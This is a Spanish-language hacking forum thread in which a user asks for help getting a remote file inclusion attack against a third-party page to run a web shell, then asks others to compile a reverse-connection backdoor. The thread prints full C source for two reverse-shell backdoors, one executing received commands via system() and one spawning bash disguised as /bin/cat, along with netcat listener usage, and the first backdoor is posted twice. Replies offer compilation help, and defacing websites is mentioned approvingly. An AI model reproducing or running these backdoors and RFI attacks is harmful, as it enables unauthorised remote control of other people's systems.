Autor
|
Tema: Problema haciendo un RFI (Leído 5,658 veces)
|
Hacker-SN4K3
Desconectado
Mensajes: 13
|
Buenas, hacia tiempo que no me pasaba por aquí, pero ya que estoy, me gustaria saber, porqué mi server, al ejecutar la shell en .txt solo me muestra lo que hay dentro del txt. Es decir yo estoy en la pagina vulnerable: www.paginavul.com/index.php?pagina=http://miserver.com/shell.txtY cuando hago eso me muestra el codigo de la shell, no la shell en si. Si la guardo con formato de imagen, me dice que no se puede mostrar porqué está dañada, y no hace su efecto. Gracias por adelantado, SN4K3 PD: Si algun mod lee esto, si puede que me canvie el nombre a Zander.
|
|
|
En línea
|
|
|
|
Crack_X
Anti-War
Ex-Staff
Desconectado
Mensajes: 2.322
Peace & Love
|
Quizas no es vulnerable? Como sabes que en verdad es vulnerable?
|
|
|
En línea
|
|
|
|
Hacker-SN4K3
Desconectado
Mensajes: 13
|
Wow! Gracias por eso, vi un php que mostraba los archivos externos... pero no dejaba de ser un iframe Y ahora, hay alguna manera de hacer un RFI a través de un iframe?
|
|
|
En línea
|
|
|
|
|
Hacker-SN4K3
Desconectado
Mensajes: 13
|
La verdad que si, muchisimas gracias! EDIT: Alguien podria compilar este backdoor de conexion inversa? O si ya lo tienen mejor, es el BackConnect. Saludos! Nota del moderador: Si no sabes compilar 40 lineas de código en C mejor dedícate a otra cosa. Aquí el code: /* oooo...oooo.oooooooo8.ooooooooooo .8888o..88.888........88..888..88 .88.888o88..888oooooo.....888.... .88...8888.........888....888.... o88o....88.o88oooo888....o888o... ********************************* **** Network security team ****** ********* nst.void.ru *********** ********************************* * Title: nsT BackConnect Backdoor v1.0 * Date: 09.04.2006 * Usage: * client: nc -lp 9999 * server: ./backconnect <ip_client> 9999 ********************************* */
#include <stdlib.h> #include <stdio.h> #include <error.h> #include <string.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/types.h> #include <resolv.h>
int main (int argc, char **argv) { struct sockaddr_in sock; int sd; char command[256]; if (argc < 3) { printf("%s <host> <port>\n", argv[0]); return 1; } close(1); if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) { perror(argv[0]); return 1; } bzero(&sock, sizeof(sock)); sock.sin_family = AF_INET; sock.sin_port = htons(atoi(argv[2])); inet_aton(argv[1], &sock.sin_addr); if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) { perror(argv[0]); return 1; } close(2); dup(sd); bzero(command, 256); while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) { system(command); bzero(command, 256); } close(sd); return 0; }
|
|
« Última modificación: 3 Abril 2007, 17:28 pm por ANELKAOS »
|
En línea
|
|
|
|
Hacker-SN4K3
Desconectado
Mensajes: 13
|
Porque no se porque me da errores de que algunas librerias no las encuentra.
|
|
|
En línea
|
|
|
|
octalh
Desconectado
Mensajes: 518
"El sueño de la razón produce monstruos"
|
buen backdoor aki otro code + /* Writed by Rozor !Sub_Level */ /* irc-hispano.org #sub_level ( xZR ) */ /* http://sincontrol.tomahost.org */ /* on C/C++ for Linux*/ /* gcc XZrshell.c -o XZrshell */ /* Name ID = /bin/cat */
#include <stdio.h> #include <string.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h>
int main() { int sck; struct sockaddr_in rhost; char *IP = "127.0.0.1"; /* Direccion ip */ unsigned short PORT = 666; /* Puerto */ rhost.sin_family = AF_INET; rhost.sin_port = htons(PORT); rhost.sin_addr.s_addr = inet_addr("127.0.0.1"); memset(&(rhost.sin_zero), '\0', 8); sck = socket(AF_INET, SOCK_STREAM, 0); connect(sck, (struct sockaddr *)&rhost, sizeof(rhost)); if(!fork()) {
setsid(); dup2(sck, 0); dup2(sck, 1); dup2(sck, 2); dup2(sck, 3); dup2(sck, 4); dup2(sck, 5); execl("/bin/bash", "/bin/cat", NULL); close(sck); }
} es bastante sencillo pero practiko tambien bytes
|
|
|
En línea
|
|
|
|
kamsky
|
no te debiera de dar problemas...has buscado si tienes esas librerias?? si es así al compilar incluyelas en la ruta con : -L <ruta> si no las tienes, bájatelas y colócalas en las rutas por defecto: /lib o /usr/lib
|
|
|
En línea
|
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---
hack 4 free!!
|
|
|
##shadow##
Desconectado
Mensajes: 11
|
si, es raro, deberia funcionar, lo unico es que lo estes compilando en windows, las sys/ no te las reconoceria, esas son para linux, en caso de ser asi, usa linux o cygwin
|
|
|
En línea
|
|
|
|
Hacker-SN4K3
Desconectado
Mensajes: 13
|
La verdad que si, muchisimas gracias! EDIT: Alguien podria compilar este backdoor de conexion inversa? O si ya lo tienen mejor, es el BackConnect. Saludos! Nota del moderador: Si no sabes compilar 40 lineas de código en C mejor dedícate a otra cosa.Aquí el code: /* oooo...oooo.oooooooo8.ooooooooooo .8888o..88.888........88..888..88 .88.888o88..888oooooo.....888.... .88...8888.........888....888.... o88o....88.o88oooo888....o888o... ********************************* **** Network security team ****** ********* nst.void.ru *********** ********************************* * Title: nsT BackConnect Backdoor v1.0 * Date: 09.04.2006 * Usage: * client: nc -lp 9999 * server: ./backconnect <ip_client> 9999 ********************************* */
#include <stdlib.h> #include <stdio.h> #include <error.h> #include <string.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/types.h> #include <resolv.h>
int main (int argc, char **argv) { struct sockaddr_in sock; int sd; char command[256]; if (argc < 3) { printf("%s <host> <port>\n", argv[0]); return 1; } close(1); if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) { perror(argv[0]); return 1; } bzero(&sock, sizeof(sock)); sock.sin_family = AF_INET; sock.sin_port = htons(atoi(argv[2])); inet_aton(argv[1], &sock.sin_addr); if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) { perror(argv[0]); return 1; } close(2); dup(sd); bzero(command, 256); while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) { system(command); bzero(command, 256); } close(sd); return 0; } Mira "moderador" yo no se de que conyo vas, pero seguro que tu no naciste defaceando una web, sino que lo aprendistes, y por algo se empieza, así que te tranquilizas OK?
|
|
|
En línea
|
|
|
|
|
|